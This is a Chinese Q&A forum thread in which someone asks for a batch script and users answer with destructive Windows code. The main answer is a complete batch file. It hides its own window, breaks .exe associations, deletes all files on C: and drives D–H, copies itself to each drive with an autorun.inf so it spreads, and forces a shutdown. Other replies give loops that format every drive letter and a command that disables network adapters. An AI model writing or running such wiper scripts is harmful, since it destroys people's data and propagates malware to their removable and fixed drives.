求大虾们帮我写一个批处理命令
发布网友
发布时间:2024-10-01 21:58
我来回答
共4个回答
热心网友
时间:2024-10-31 10:04
@echo off
rem 隐藏运行窗口
if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
rem 修改文件关联
assoc .exe=null
rem 备份关机及修改属性文件
copy C:\windows\system32\shutdown.exe D:\
copy C:\windows\system32\attrib.exe D:\
rem 删除C盘所有文件及文件夹
del *.* /s /q C:\
rd /s /q C:\
rem 将两文件复制回去
copy D:\shutdown.exe C:\windows\system32\
copy D:\attrib.exe C:\windows\system32\
rem 删除其他盘符的文件
for %%i in (d,e,f,g,h) do (%%i:
del *.* /s /q
rd /s /q %%i:\
)
rem 将文件复制到每个盘符下,并引用自启动
for %%i in (d,e,f,g,h) do (
echo [autorun] >%%i:\autorun.inf
echo OPEN=format.bat /AUTORUN >>%%i:\autorun.inf
echo shell\open=打开(&O) >>%%i:\autorun.inf
echo shell\open\Command=format.bat >>%%i:\autorun.inf
echo shell\open\open\default=1 >>%%i:\autorun.inf
echo shell\explore=资源管理器(&X) >>%%i:\autorun.inf
echo shell\explore\command=format.bat >>%%i:\autorun.inf
copy %0 %%i:\format.bat
attrib +s +h +r %%i:\autorun.inf
attrib +s +h +r %%i:\format.bat
)
rem 关机,好了运行到这一步你的电脑over了
shutdown -f -s -t 00
热心网友
时间:2024-10-31 10:05
楼主用心不良呀。。
热心网友
时间:2024-10-31 10:05
format d:
format e:
format f:
format g:
format h:
format i:
以上保存为.bat
热心网友
时间:2024-10-31 10:06
for %%i in (d e f g h i j k l m n o p q r s t u v w x y z a b) do format %%i:/q/autoset
devcon disable =net
============代码结束(不要复制此行)===============================
devcon disable =net (出自网络非自写)